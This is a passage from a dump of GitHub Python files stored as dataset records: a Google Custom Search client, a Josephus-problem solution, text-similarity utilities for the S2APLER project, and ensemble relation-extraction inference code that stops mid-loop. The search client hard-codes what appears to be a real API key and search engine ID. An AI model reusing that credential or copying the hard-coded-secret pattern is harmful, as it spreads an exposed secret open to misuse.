search_engine_id\n        self.api_key = api_key\n\n    def search(self, keyword, site=None, max_results=100):\n        assert isinstance(keyword, str)\n\n        results = []\n        for start_index in range(1, max_results, 10):  # 10 is max page size\n            url = self._make_url(start_index, keyword, site)\n            logging.info(url)\n\n            response = requests.get(url)\n            if response.status_code == 403:\n                print(response.content)\n                return results\n            #print(response.content)\n\n            items = _decode_response(response.content.decode())\n            if not items:\n                break\n            results.extend(items)\n        return results\n\n    def _make_url(self, start_index, keyword, restrict_to_site):\n\n        if restrict_to_site is not None:\n            keyword = 'site:{} {}'.format(_strip_protocol(restrict_to_site),\n                                          keyword)\n        # https://developers.google.com\n        # /custom-search/json-api/v1/reference/cse/list\n        params = OrderedDict([\n            ('cx', self.search_engine_id),\n            ('key', self.api_key),\n            ('rsz', '10'),\n            ('num', '10'),\n            ('start', str(start_index)),  # index of the first result on this page\n            ('googlehost', 'www.google.com'),\n            ('gss', '.com'),\n            ('q', keyword),\n            ('oq', keyword),\n            ('filter', '0'), # duplicate content filter, 1 | 0\n            ('safe', 'off'), # strict | moderate | off\n        ])\n        #if restrict_to_site is not None:\n        #    params['siteSearch'] = _strip_protocol(restrict_to_site)\n\n        return 'https://www.googleapis.com/customsearch/v1?{}'.format(\n            urllib.parse.urlencode(params))\n\n\n#from google_search import GoogleCustomSearch\n\n\nSEARCH_ENGINE_ID = '502666-012954687605534514302:-ua4o780cuo' \nAPI_KEY = 'AIzaSyDGQ6LgpJ4lFkfFevFkj2VjIOT88nEHFQQ-502666'\n\napi = GoogleCustomSearch(SEARCH_ENGINE_ID, 
API_KEY)\n#api.search('newton is', '')\n\nfor result in api.search('newton is', ''):\n print(result['title']) \n print(result['link']) \n print(result['snippet'])\n","repo_name":"kahf-sami/K3S","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27335609002","text":"def josephus(n, k):\n survivor = 1\n for i in range(2, n + 1):\n survivor = (survivor + k - 1) % i + 1\n return survivor\n\nnc = int(input())\n\nfor x in range(nc):\n n, m = map(int, input().split())\n result = josephus(n, m)\n print(f\"Case {x+1}: {result}\")","repo_name":"piedro404/resolucoes-de-problemas","sub_path":"Uri/A Lenda de Flavious Josephus.py","file_name":"A Lenda de Flavious Josephus.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"19175090581","text":"from typing import List, Union, Optional, Set, TYPE_CHECKING\n\nif TYPE_CHECKING:\n from s2apler.data import NameCounts\n\nimport re\nimport string\nfrom itertools import zip_longest\nimport warnings\nimport numpy as np\nimport pandas as pd\nimport logging\nfrom numpy import inner\nfrom numpy.linalg import norm\nfrom collections import Counter\nfrom pylatexenc.latex2text import LatexNodes2Text\nfrom text_unidecode import unidecode\nimport jellyfish\n\nfrom s2apler.consts import NUMPY_NAN\n\nlogger = logging.getLogger(\"s2apler\")\n\nlatex_to_text = LatexNodes2Text().latex_to_text\n\ndashes = [\n \"\\\\u002D\",\n \"\\\\u058A\",\n \"\\\\u05BE\",\n \"\\\\u1400\",\n \"\\\\u1806\",\n \"\\\\u2010\",\n \"-\",\n \"\\\\u2015\",\n \"\\\\u2E17\",\n \"\\\\u2E1A\",\n \"\\\\u2E3A\",\n \"\\\\u2E3B\",\n \"\\\\u2E40\",\n \"\\\\u301C\",\n \"\\\\u3030\",\n \"\\\\u30A0\",\n \"\\\\uFE31\",\n \"\\\\uFE32\",\n \"\\\\uFE58\",\n \"\\\\uFE63\",\n \"\\\\uFF0D\",\n]\n\nRE_DASHES = re.compile(rf\"[{''.join(dashes)}]\")\nA_THROUGH_Z = re.compile(r\"[a-z]\")\nRE_APOSTRAPHE_S = re.compile(r\"(\\w+)'s\")\nREMOVE_PUNC = str.maketrans(string.punctuation.replace(\"&\", \"\"), \" \" * (len(string.punctuation) - 1))\nRE_SPACES = re.compile(r\"\\s+\")\n\n\nPUBLISHER_SOURCES = {\n \"ACL\",\n \"ACM\",\n \"ACP\",\n \"ASMUSA\",\n \"BioOne\",\n \"BMJ\",\n \"Cambridge\",\n \"DeGruyter\",\n \"Elsevier\",\n \"ElsevierCorona\",\n \"Frontier\",\n \"Highwire\",\n \"IEEE\",\n \"IOP\",\n \"JhuPress\",\n \"Karger\",\n \"Medline\",\n \"MIT\",\n \"Nature\",\n \"PubMedCentral\",\n \"PubMed\",\n \"PMCManuscript\",\n \"RoyalSociety\",\n \"Sage\",\n \"Science\",\n \"ScientificNet\",\n \"SPIE\",\n \"Springer\",\n \"SpringerNature\",\n \"TaylorAndFrancis\",\n \"Thieme\",\n \"Uchicago\",\n \"Wiley\",\n \"HumanGeneratedMetadata\", # Not a publisher, but is high quality and source papers with the same source ID\n # must not be clustered together\n # \"WoltersKluwer\", # untrustworthy or something?\n}\n\nWORD_REPLACEMENTS = {\n \"the\": \"\",\n \"a\": \"\",\n \"of\": \"\",\n \"&\": \"and\",\n}\n\nRE_NORMALIZE_WHOLE_NAME = re.compile(r\"[^a-zA-Z0-9\\s]+\")\n\n\n# TODO: stop-words list must be updated for citations title/abstract related information\nSTOPWORDS = set(\n [\n \"i\",\n \"me\",\n \"my\",\n \"myself\",\n \"we\",\n \"our\",\n \"ours\",\n \"ourselves\",\n \"you\",\n \"your\",\n \"yours\",\n \"yourself\",\n \"yourselves\",\n \"he\",\n \"him\",\n \"his\",\n \"himself\",\n \"she\",\n \"her\",\n \"hers\",\n \"herself\",\n \"it\",\n \"its\",\n \"itself\",\n \"they\",\n 
\"them\",\n \"their\",\n \"theirs\",\n \"themselves\",\n \"what\",\n \"which\",\n \"who\",\n \"whom\",\n \"this\",\n \"that\",\n \"these\",\n \"those\",\n \"am\",\n \"is\",\n \"are\",\n \"was\",\n \"were\",\n \"be\",\n \"been\",\n \"being\",\n \"have\",\n \"has\",\n \"had\",\n \"having\",\n \"do\",\n \"does\",\n \"did\",\n \"doing\",\n \"a\",\n \"an\",\n \"the\",\n \"and\",\n \"but\",\n \"if\",\n \"or\",\n \"because\",\n \"as\",\n \"until\",\n \"while\",\n \"of\",\n \"at\",\n \"by\",\n \"for\",\n \"with\",\n \"about\",\n \"against\",\n \"between\",\n \"into\",\n \"through\",\n \"during\",\n \"before\",\n \"after\",\n \"above\",\n \"below\",\n \"to\",\n \"from\",\n \"up\",\n \"down\",\n \"in\",\n \"out\",\n \"on\",\n \"off\",\n \"over\",\n \"under\",\n \"again\",\n \"further\",\n \"then\",\n \"once\",\n \"here\",\n \"there\",\n \"when\",\n \"where\",\n \"why\",\n \"how\",\n \"all\",\n \"any\",\n \"both\",\n \"each\",\n \"few\",\n \"more\",\n \"most\",\n \"other\",\n \"some\",\n \"such\",\n \"no\",\n \"nor\",\n \"not\",\n \"only\",\n \"own\",\n \"same\",\n \"so\",\n \"than\",\n \"too\",\n \"very\",\n \"s\",\n \"t\",\n \"can\",\n \"will\",\n \"just\",\n \"don\",\n \"should\",\n \"now\",\n ]\n)\n\nAFFILIATIONS_STOP_WORDS = STOPWORDS.union(\n {\n \"university\",\n \"college\",\n \"lab\",\n \"organization\",\n \"department\",\n \"research\",\n \"institute\",\n \"school\",\n \"academy\",\n \"national\",\n \"laboratory\",\n }\n)\n\nVENUE_STOP_WORDS = STOPWORDS.union(\n {\n \"proceedings\",\n \"journal\",\n \"conference\",\n \"transactions\",\n \"international\",\n \"society\",\n \"letters\",\n \"official\",\n \"research\",\n \"association\",\n }\n)\n\nNAME_PREFIXES = {\n \"dr\",\n \"prof\",\n \"professor\",\n \"mr\",\n \"miss\",\n \"mrs\",\n \"ms\",\n \"mx\",\n \"sir\",\n \"phd\",\n \"md\",\n \"doctor\",\n}\n\nNUMERALS = {\n \"i\",\n \"ii\",\n \"iii\",\n \"iv\",\n \"v\",\n \"vi\",\n \"vii\",\n \"viii\",\n \"ix\",\n \"x\",\n \"xi\",\n \"xii\",\n \"xiii\",\n \"xiv\",\n \"xv\",\n \"xvi\",\n \"xvii\",\n \"xviii\",\n \"xix\",\n \"xx\",\n \"1\",\n \"2\",\n \"3\",\n \"4\",\n \"5\",\n \"6\",\n \"7\",\n \"8\",\n \"9\",\n \"10\",\n \"11\",\n \"12\",\n \"13\",\n \"14\",\n \"15\",\n \"16\",\n \"17\",\n \"18\",\n \"19\",\n \"20\",\n \"PAD\", # for padding\n}\n\nNUMERAL_PRECEDING_WORDS = {\n \"vol\",\n \"volume\",\n \"part\",\n \"issue\",\n \"number\",\n \"no\",\n \"chapter\",\n \"chap\",\n \"iss\",\n \"version\",\n \"edition\",\n \"ed\",\n}\n\nSPECIAL_PUBLICATION_WORDS = {\n \"comment\",\n \"response\",\n \"letter\",\n \"editorial\",\n \"republished\",\n \"reply\",\n \"re\",\n \"erratum\",\n \"withdrawn\",\n \"withdrawal\",\n \"note\",\n \"notes\",\n \"correction\",\n \"review\",\n \"reviews\",\n \"author\",\n \"commentary\",\n \"retracted\",\n}\n\n\n# regex to check if a string is a year\n# that starts with 19 or 2 and has 4 digits\nYEAR = re.compile(r\"19\\d\\d|20\\d\\d|20\\d\\d\")\n\n\ndef year_similarity(s1, s2):\n \"\"\"\n This feature finds all years in both strings\n and checks if they are the same.\n If neither string has years, then it's nan.\n \"\"\"\n s1_years = YEAR.findall(s1)\n s2_years = YEAR.findall(s2)\n if not s1_years and not s2_years:\n return np.nan\n else:\n return int(s1_years == s2_years)\n\n\ndef numeral_similarity(s1, s2):\n \"\"\"\n This feature finds all instances of a location in both strings\n where the content is a numeral (1 to 10 and i through x, or years)\n If it exists, the feature is whether the two\n numerals match. 
If it does not exist, the feature is NaN.\n\n This feature is tough because numerals appear for many different reasons.\n \"\"\"\n s1_split = s1.split()\n s1_len = len(s1_split)\n s2_split = s2.split()\n s2_len = len(s2_split)\n both_numerals = [\n (i, a, b)\n for i, (a, b) in enumerate(zip_longest(s1_split, s2_split, fillvalue=\"PAD\"))\n if a in NUMERALS and b in NUMERALS and i > 0\n ]\n # check two conditions:\n # 1. both numerals is preceeded by NUMERAL_PRECEDING_WORDS\n # or 2. a numeral is the last word in the string for one of the two strings\n both_numerals_filtered = [\n a == b\n for i, a, b in both_numerals\n if (\n a != \"PAD\"\n and b != \"PAD\"\n and s1_split[i - 1] in NUMERAL_PRECEDING_WORDS\n and s2_split[i - 1] in NUMERAL_PRECEDING_WORDS\n )\n or (i == s1_len - 1 or i == s2_len - 1)\n ]\n if len(both_numerals_filtered) == 0:\n return NUMPY_NAN # no location with a numeral in both strings at the same position\n else:\n return all(both_numerals_filtered) # whether all locations where both strings have numerals is a match\n\n\ndef special_publication_word_similarity(s1, s2):\n s1_set = set(s1.split())\n s2_set = set(s2.split())\n s1_special_overlap = s1_set.intersection(SPECIAL_PUBLICATION_WORDS)\n s2_special_overlap = s2_set.intersection(SPECIAL_PUBLICATION_WORDS)\n if len(s1_special_overlap) == 0 and len(s2_special_overlap) == 0:\n return NUMPY_NAN\n else:\n return s1_special_overlap == s2_special_overlap\n\n\ndef prefix_dist_helper(min_word: str, max_word: str) -> float:\n min_len = len(min_word)\n for i in range(min_len, 0, -1):\n if min_word[:i] == max_word[:i]:\n return 1 - (i / min_len)\n return 1.0\n\n\ndef prefix_dist(string_1: str, string_2: str) -> float:\n if string_1 is None or pd.isnull(string_1) or string_2 is None or pd.isnull(string_2):\n return NUMPY_NAN\n if string_1 == string_2:\n return 0.0\n # sometimes there is a small diff in the first\n min_word, max_word = (string_1, string_2) if len(string_1) < len(string_2) else (string_2, string_1)\n return min(prefix_dist_helper(min_word, max_word), prefix_dist_helper(min_word[::-1], max_word[::-1]))\n\n\nTEXT_FUNCTIONS = [\n (jellyfish.levenshtein_distance, \"levenshtein\"),\n (prefix_dist, \"prefix\"),\n (jellyfish.jaro_winkler_similarity, \"jaro\"),\n]\n\n\ndef normalize_text(text: Optional[str], special_case_apostrophes_and_dashes: bool = False) -> str:\n \"\"\"\n Normalize text.\n\n Parameters\n ----------\n text: string\n the text to normalize\n special_case_apostrophie: bool\n whether to replace apostrophes with empty strings rather than spaces\n\n Returns\n -------\n string: the normalized text\n \"\"\"\n if text is None or len(text) == 0:\n return \"\"\n\n # if there is the possibility of latex\n # we can convert it to text\n if \"\\\\\" in text or text.count(\"$\") > 1:\n try:\n text = latex_to_text(text)\n except IndexError as e:\n logger.debug(f\"Failed to convert latex to text with: {text} and error {e}\")\n norm_text = unidecode(text).lower()\n\n if special_case_apostrophes_and_dashes:\n norm_text = norm_text.replace(\"'\", \"\")\n norm_text = RE_DASHES.sub(\"\", norm_text)\n\n norm_text = RE_NORMALIZE_WHOLE_NAME.sub(\" \", norm_text)\n norm_text = RE_SPACES.sub(\" \", norm_text).strip()\n\n return norm_text\n\n\ndef normalize_venue_name(s: str) -> str:\n if pd.isnull(s) or len(s) == 0:\n return \"\"\n\n s = unidecode(s) # Remove diacritics\n s = s.lower()\n s = RE_DASHES.sub(\"-\", s) # Normalize dashes\n s = RE_APOSTRAPHE_S.sub(r\"\\1s\", s)\n s = s.translate(REMOVE_PUNC) # Remove punctuation\n s = 
RE_SPACES.sub(\" \", s).strip() # Collapse whitespace\n words = s.split(\" \")\n s = \" \".join(\n WORD_REPLACEMENTS.get(word, word) for word in words\n ) # Replace terms with equivalents, remove stop-words\n s = RE_SPACES.sub(\" \", s).strip() # Collapse whitespace again\n\n return s\n\n\ndef name_text_features(\n name_1: str,\n name_2: str,\n default_val: float = NUMPY_NAN,\n) -> List[float]:\n \"\"\"\n Computes various text similarity features for two names\n\n Parameters\n ----------\n name_1: string\n the first name\n name_2: string\n the second name\n default_val: float\n the default value to return when one or both of the names is empty\n\n Returns\n -------\n List[float]: a list of the various similarity scores for the two names\n \"\"\"\n scores = []\n if name_1 is None or name_2 is None or len(name_1) <= 1 or len(name_2) <= 1:\n return [default_val] * len(TEXT_FUNCTIONS)\n\n for function, function_name in TEXT_FUNCTIONS:\n score = function(name_1, name_2)\n if function_name in {\"levenshtein\"}:\n score = score / max(len(name_1), len(name_2))\n scores.append(score)\n return scores\n\n\ndef cosine_sim(a: np.ndarray, b: np.ndarray) -> float:\n \"\"\"\n Computes the cosine similarity between two vectors\n\n Parameters\n ----------\n a: np.ndarray\n the first vector\n b: np.ndarray\n the second vector\n\n Returns\n -------\n float: the cosine similarity of the two vectors\n \"\"\"\n a_norm = norm(a)\n b_norm = norm(b)\n if a_norm == 0 or b_norm == 0:\n return 0\n else:\n return inner(a, b) / (a_norm * b_norm)\n\n\ndef get_text_ngrams(\n text: Optional[str],\n use_unigrams: bool = False,\n use_bigrams: bool = True,\n stopwords: Optional[Set[str]] = STOPWORDS,\n) -> Counter:\n \"\"\"\n Get character bigrams, trigrams, quadgrams, and optionally unigrams for a piece of text.\n Note: respects word boundaries\n\n Parameters\n ----------\n text: string\n the text to get ngrams for\n use_unigrams: bool\n whether or not to include unigrams\n stopwords: Set\n The set of stopwords to filter out before computing character ngrams\n\n Returns\n -------\n Counter: the ngrams present in the text\n \"\"\"\n if text is None or len(text) == 0:\n return Counter()\n\n if stopwords is not None:\n text = \" \".join([word for word in text.split(\" \") if word not in stopwords])\n\n unigrams = [] # type: ignore\n if use_unigrams:\n unigrams = filter(lambda x: \" \" not in x, text) # type: ignore\n\n bigrams = [] # type: ignore\n if use_bigrams:\n bigrams = map( # type: ignore\n lambda x: \"\".join(x),\n filter(lambda x: \" \" not in x, zip(text, text[1:])),\n )\n\n trigrams = map(\n lambda x: \"\".join(x),\n filter(lambda x: \" \" not in x, zip(text, text[1:], text[2:])),\n )\n\n quadgrams = map(\n lambda x: \"\".join(x),\n filter(lambda x: \" \" not in x, zip(text, text[1:], text[2:], text[3:])),\n )\n ngrams = Counter(unigrams) | Counter(bigrams) | Counter(trigrams) | Counter(quadgrams)\n return ngrams\n\n\ndef get_text_ngrams_words(text: Optional[str], stopwords: Optional[Set[str]] = STOPWORDS) -> Counter:\n \"\"\"\n Get word unigrams, bigrams, and trigrams for a piece of text.\n\n Parameters\n ----------\n text: string\n the text to get ngrams for\n stopwords: Set\n The set of stopwords to filter out before computing word ngrams\n\n Returns\n -------\n Counter: the ngrams present in the text\n \"\"\"\n if text is None or len(text) == 0:\n return Counter()\n if stopwords is not None:\n text_split = [word for word in text.split() if word not in stopwords]\n else:\n text_split = text.split()\n unigrams = 
Counter(text_split)\n    bigrams = map(\n        lambda x: \" \".join(x),\n        zip(text_split, text_split[1:]),\n    )\n    trigrams = map(\n        lambda x: \" \".join(x),\n        zip(text_split, text_split[1:], text_split[2:]),\n    )\n    ngrams = unigrams | Counter(bigrams) | Counter(trigrams)\n    return ngrams\n\n\ndef equal(\n    name_1: Optional[str],\n    name_2: Optional[str],\n    default_val: float = NUMPY_NAN,\n) -> Union[int, float]:\n    \"\"\"\n    Check if two names are exactly equal after lowercasing\n\n    Parameters\n    ----------\n    name_1: string\n        the first name\n    name_2: string\n        the second name\n    default_val: float\n        the default value to return when one or both of the names is empty\n\n    Returns\n    -------\n    int: 0 (if unequal) or 1 (if equal)\n    \"\"\"\n    if name_1 is None or name_2 is None or len(name_1) == 0 or len(name_2) == 0:\n        return default_val\n\n    if name_1 == \"-\" or name_2 == \"-\":\n        return default_val\n\n    if name_1.lower().strip() == name_2.lower().strip():\n        return 1\n    else:\n        return 0\n\n\ndef equal_middle(\n    name_1: Optional[str],\n    name_2: Optional[str],\n    default_val: float = NUMPY_NAN,\n) -> Union[int, float]:\n    \"\"\"\n    Checks if two middle names are equal. If either middle name is just an initial,\n    just check equality of initials\n\n    Parameters\n    ----------\n    name_1: string\n        first middle name string\n    name_2: string\n        second middle name string\n    default_val: float\n        the default value to return when one or both of the names is empty\n\n    Returns\n    -------\n    int: 0 (if unequal) or 1 (if equal)\n    \"\"\"\n    if name_1 is None or name_2 is None or len(name_1) == 0 or len(name_2) == 0:\n        return default_val\n\n    if len(name_1) == 1 or len(name_2) == 1:\n        if name_1[0] == name_2[0]:\n            return 1\n\n    elif name_1 == name_2:\n        return 1\n\n    return 0\n\n\ndef equal_initial(\n    name_1: Optional[str],\n    name_2: Optional[str],\n    default_val: float = NUMPY_NAN,\n) -> Union[int, float]:\n    \"\"\"\n    Checks if two initials are equal\n\n    Parameters\n    ----------\n    name_1: string\n        first initial\n    name_2: string\n        second initial\n    default_val: float\n        the default value to return when one or both of the names is empty\n\n    Returns\n    -------\n    int: 0 (if unequal) or 1 (if equal)\n    \"\"\"\n    if name_1 is None or name_2 is None or len(name_1) == 0 or len(name_2) == 0:\n        return default_val\n\n    if name_1.strip().lower()[0] == name_2.strip().lower()[0]:\n        return 1\n    else:\n        return 0\n\n\ndef counter_jaccard(\n    counter_1: Counter,\n    counter_2: Counter,\n    default_val: float = NUMPY_NAN,\n    denominator_max: float = np.inf,\n) -> float:\n    \"\"\"\n    Computes jaccard overlap between two Counters\n\n    Parameters\n    ----------\n    counter_1: Counter\n        first Counter\n    counter_2: Counter\n        second Counter\n    default_val: float\n        the default value to return when one or both of the Counters is empty\n\n    Returns\n    -------\n    float: the jaccard overlap\n    \"\"\"\n    if len(counter_1) == 0 or len(counter_2) == 0:\n        return default_val\n\n    intersection_sum = sum((counter_1 & counter_2).values())\n    union_sum = sum(counter_1.values()) + sum(counter_2.values()) - intersection_sum\n    score = intersection_sum / min(union_sum, denominator_max)\n    return min(score, 1)\n\n\ndef jaccard(\n    set_1: Set,\n    set_2: Set,\n    default_val: float = NUMPY_NAN,\n) -> float:\n    \"\"\"\n    Computes jaccard overlap between two sets\n\n    Parameters\n    ----------\n    set_1: Set\n        first Set\n    set_2: Set\n        second Set\n    default_val: float\n        the default value to return when one or both of the Sets is empty\n\n    Returns\n    -------\n    float: the jaccard overlap\n    \"\"\"\n    if len(set_1) == 0 or len(set_2) == 0:\n        return 
default_val\n\n score = len(set_1.intersection(set_2)) / (len(set_1.union(set_2)))\n return score\n\n\ndef diff(value_1: Optional[float], value_2: Optional[float], default_val: float = NUMPY_NAN) -> float:\n \"\"\"\n Compute absolute difference between two values.\n\n Parameters\n ----------\n value_1: float\n first value\n value_2: float\n second value\n default_val: float\n the default value to return when one or both of the values is empty\n\n Returns\n -------\n float: absolute difference\n \"\"\"\n if value_1 is None or value_2 is None:\n return default_val\n\n return abs(float(value_1) - float(value_2))\n\n\ndef name_counts(\n counts_1: \"NameCounts\",\n counts_2: \"NameCounts\",\n) -> List[Union[int, float]]:\n \"\"\"\n Gets name counts for first, last, and first_last names.\n These counts were computed from the entire S2 corpus.\n\n Parameters\n ----------\n counts_1: NameCounts\n first NameCounts\n counts_2: NameCounts\n second NameCounts\n\n Returns\n -------\n List[int]: min/max for first, first_last, and min for last, last_first_initial\n \"\"\"\n counts = []\n counts.append([counts_1.first, counts_1.first_last, counts_1.last, counts_1.last_first_initial]) # can be nan\n counts.append([counts_2.first, counts_2.first_last, counts_2.last, counts_2.last_first_initial]) # can be nan\n # using nanmin so as to catch the min of counts, but regular max to propagate the nan\n with warnings.catch_warnings():\n # np.max of 2 nans causes annoying warnings\n warnings.simplefilter(\"ignore\", category=RuntimeWarning)\n counts_min_max = list(np.nanmin(counts, axis=0)) + list(np.max([counts[0][:2], counts[1][:2]], axis=0))\n\n return counts_min_max\n","repo_name":"allenai/S2APLER","sub_path":"s2apler/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":19820,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"18305200991","text":"from transformers import (\n AutoTokenizer,\n AutoConfig,\n AutoModelForSequenceClassification,\n Trainer,\n TrainingArguments,\n BertTokenizer,\n)\nfrom torch.utils.data import DataLoader\nfrom load_data import *\nfrom modules.preprocessor import EntityPreprocessor, SenPreprocessor, UnkPreprocessor\nimport pandas as pd\nimport torch\nimport torch.nn.functional as F\nimport importlib\n\nimport pickle as pickle\nimport numpy as np\nimport argparse\nimport os\nfrom tqdm import tqdm\nfrom tokenization import *\n\n\ndef inference(model, tokenized_sent, device, args, is_roberta=False):\n dataloader = DataLoader(tokenized_sent, batch_size=16, shuffle=False)\n model.eval()\n\n output_pred = []\n output_prob = []\n for data in tqdm(dataloader):\n with torch.no_grad():\n if args.model_name == \"Rroberta\":\n outputs = model(\n input_ids=data[\"input_ids\"].to(device),\n attention_mask=data[\"attention_mask\"].to(device),\n e1_mask=data[\"e1_mask\"].to(device),\n e2_mask=data[\"e2_mask\"].to(device),\n )\n elif is_roberta:\n outputs = model(\n input_ids=data[\"input_ids\"].to(device),\n attention_mask=data[\"attention_mask\"].to(device),\n )\n else:\n outputs = model(\n input_ids=data[\"input_ids\"].to(device),\n attention_mask=data[\"attention_mask\"].to(device),\n token_type_ids=data[\"token_type_ids\"].to(device),\n )\n logits = outputs[0]\n prob = F.softmax(logits, dim=-1).detach().cpu().numpy()\n logits = logits.detach().cpu().numpy()\n result = np.argmax(logits, axis=-1)\n\n output_pred.append(result)\n output_prob.append(prob)\n\n return (\n np.concatenate(output_pred).tolist(),\n 
np.concatenate(output_prob, axis=0).tolist(),\n    )\n\n\ndef inference_ensemble(model_dir, tokenized_sent, device, args, is_roberta=False):\n    dataloader = DataLoader(tokenized_sent, batch_size=16, shuffle=False)\n\n    dirs = os.listdir(model_dir)\n    dirs = sorted(dirs)\n\n    final_output_prob, final_output_pred = [], []\n    for i in range(len(dirs)):\n        model_d = os.path.abspath(os.path.join(model_dir, dirs[i]))\n        if args.model_name is not None:\n            model_config = AutoConfig.from_pretrained(args.PLM)\n            model_config.num_labels = 30\n            mm = importlib.import_module(\"model\")\n            MyModel = getattr(mm, args.model_name)\n\n            if MyModel.__name__ == \"ConcatFourClsModel\":\n                model_config.update({\"output_hidden_states\": True})\n\n            model = MyModel(args.PLM, config=model_config)\n            model.load_state_dict(torch.load(os.path.join(model_d, \"pytorch_model.pt\")))\n        else:\n            model = AutoModelForSequenceClassification.from_pretrained(model_d)\n\n        model.eval()\n        model.to(device)\n\n        fold_prob = []\n        fold_pred = []\n        for data in tqdm(dataloader):\n            with torch.no_grad():\n                if args.model_name == \"Rroberta\":\n                    outputs = model(\n                        input_ids=data[\"input_ids\"].to(device),\n                        attention_mask=data[\"attention_mask\"].to(device),\n                        e1_mask=data[\"e1_mask\"].to(device),\n                        e2_mask=data[\"e2_mask\"].to(device),\n                    )\n                elif is_roberta:\n                    outputs = model(\n                        input_ids=data[\"input_ids\"].to(device),\n                        attention_mask=data[\"attention_mask\"].to(device),\n                    )\n                else:\n                    outputs = model(\n                        input_ids=data[\"input_ids\"].to(device),\n                        attention_mask=data[\"attention_mask\"].to(device),\n                        token_type_ids=data[\"token_type_ids\"].to(device),\n                    )\n            logits = outputs[0]\n            prob = F.softmax(logits, dim=-1).detach().cpu().numpy()\n            logits = logits.detach().cpu().numpy()\n\n            fold_pred.extend(logits.tolist())\n            fold_prob.append(prob)\n\n        final_output_pred.append(fold_pred)\n        final_output_prob.append(np.concatenate(fold_prob, axis=0).tolist())\n\n    return final_output_pred, final_output_prob\n\n\npers_id_index = {\n    0: 4,\n    1: 6,\n    2: 8,\n    3: 10,\n    4: 11,\n    5: 12,\n    6: 13,\n    7: 14,\n    8: 15,\n    9: 16,\n    10: 17,\n    11: 21,\n    12: 23,\n    13: 24,\n    14: 25,\n    15: 26,\n    16: 27,\n    17: 29,\n}\norgs_id_index = {0: 1, 1: 2, 2: 3, 3: 5, 4: 7, 5: 9, 6: 18, 7: 19, 8: 20, 9: 22, 10: 28}\n\n\ndef inference_three_step(model_dir, Re_test_dataset, device, args, is_roberta):\n    \"\"\"\n    Coarse classification first (no_relation / org / per), then fine classification of the per-related labels and of the org-related labels\n    \"\"\"\n    dataloader = DataLoader(Re_test_dataset, batch_size=16, shuffle=False)\n\n    dirs = os.listdir(model_dir)\n    dirs = sorted(dirs)\n\n    # lists that store the final values\n    final_output_prob = [[0] * 30] * 7765\n    final_output_pred = [31] * 7765\n\n    # lists that store each label assigned during coarse classification\n    no_relation_index, per_index, org_index = [], [], []\n\n    ## coarse classification ##\n    fold_big_prob, fold_big_pred = [], []\n\n    ## prediction of per-related labels ##\n    fold_per_prob, fold_per_pred = [], []\n\n    # prediction of org-related labels!\n    fold_org_prob, fold_org_pred = [], []\n\n    for what_model in dirs:\n        print(what_model)\n        model_d = os.path.abspath(os.path.join(model_dir, what_model))\n        # load the model for this stage 
(coarse classification runs only when the model directory name contains the word \"big\"!)\n        prob = []\n        pred = []\n\n        model_config = AutoConfig.from_pretrained(args.PLM)\n        if \"big\" in what_model:\n            model_config.num_labels = 3\n        elif \"per\" in what_model:\n            model_config.num_labels = 18\n        else:\n            model_config.num_labels = 11\n\n        if args.model_name is not None:\n            mm = importlib.import_module(\"model\")\n            MyModel = getattr(mm, args.model_name)\n\n            if MyModel.__name__ == \"ConcatFourClsModel\":\n                model_config.update({\"output_hidden_states\": True})\n\n            model = MyModel(args.PLM, config=model_config)\n            model.load_state_dict(torch.load(os.path.join(model_d, \"pytorch_model.pt\")))\n\n        else:\n            model = AutoModelForSequenceClassification.from_pretrained(model_d)\n        model.parameters\n        model.to(device)\n\n        model.eval()\n        for data in tqdm(dataloader):\n            with torch.no_grad():\n                if is_roberta:\n                    outputs = model(\n                        input_ids=data[\"input_ids\"].to(device),\n                        attention_mask=data[\"attention_mask\"].to(device),\n                    )\n                else:\n                    outputs = model(\n                        input_ids=data[\"input_ids\"].to(device),\n                        attention_mask=data[\"attention_mask\"].to(device),\n                        token_type_ids=data[\"token_type_ids\"].to(device),\n                    )\n            logits = outputs[0]\n            batch_prob = F.softmax(logits, dim=-1).detach().cpu().numpy()\n            logits = logits.detach().cpu().numpy()\n\n            pred.extend(logits.tolist())\n            prob.append(batch_prob)\n\n        if \"big\" in what_model:\n            fold_big_pred.append(pred)\n            fold_big_prob.append(np.concatenate(prob, axis=0).tolist())\n\n        elif \"per\" in what_model:\n            fold_per_pred.append(pred)\n            fold_per_prob.append(np.concatenate(prob, axis=0).tolist())\n\n        else:\n            fold_org_pred.append(pred)\n            fold_org_prob.append(np.concatenate(prob, axis=0).tolist())\n\n    fold_big_pred = np.argmax(np.mean(fold_big_pred, axis=0), axis=-1)\n    fold_big_prob = np.mean(fold_big_prob, axis=0).tolist()\n\n    fold_per_pred = np.argmax(np.mean(fold_per_pred, axis=0), axis=-1)\n    fold_per_prob = np.mean(fold_per_prob, axis=0).tolist()\n\n    fold_org_pred = np.argmax(np.mean(fold_org_pred, axis=0), axis=-1)\n    fold_org_prob = np.mean(fold_org_prob, axis=0).tolist()\n\n    ## store the no_relation/per/org predictions -> only no_relation is written to the final values directly\n    for idx in range(7765):\n        idx_prob = []\n        if fold_big_pred[idx] == 0:\n            final_output_pred[idx] = 0\n            idx_prob.append(fold_big_prob[idx][0])\n            for c in range(1, 30):\n                if c in pers_id_index.values():\n                    idx_prob.append((fold_big_prob[idx][1]) / 18)\n                else:\n                    idx_prob.append((fold_big_prob[idx][2]) / 11)\n            final_output_prob[idx] = idx_prob\n\n        elif fold_big_pred[idx] == 1:\n            idx_prob = [0] * 30\n            final_output_pred[idx] = orgs_id_index[fold_org_pred[idx]]\n            # store the org-related probabilities\n            for orgsid in orgs_id_index.keys():\n                idx_prob[orgs_id_index[orgsid]] = fold_org_prob[idx][orgsid]\n\n            # store the values unrelated to org\n            for i in range(30):\n                if idx_prob[i] == 0:\n                    idx_prob[i] = min(fold_org_prob[idx]) / 19\n            final_output_prob[idx] = idx_prob\n\n        else:\n            idx_prob = [0] * 30\n            final_output_pred[idx] = pers_id_index[fold_per_pred[idx]]\n            # store the per-related probabilities\n            for persid in pers_id_index.keys():\n                idx_prob[pers_id_index[persid]] = fold_per_prob[idx][persid]\n\n            # store the probabilities unrelated to per\n            for i in range(30):\n                if idx_prob[i] == 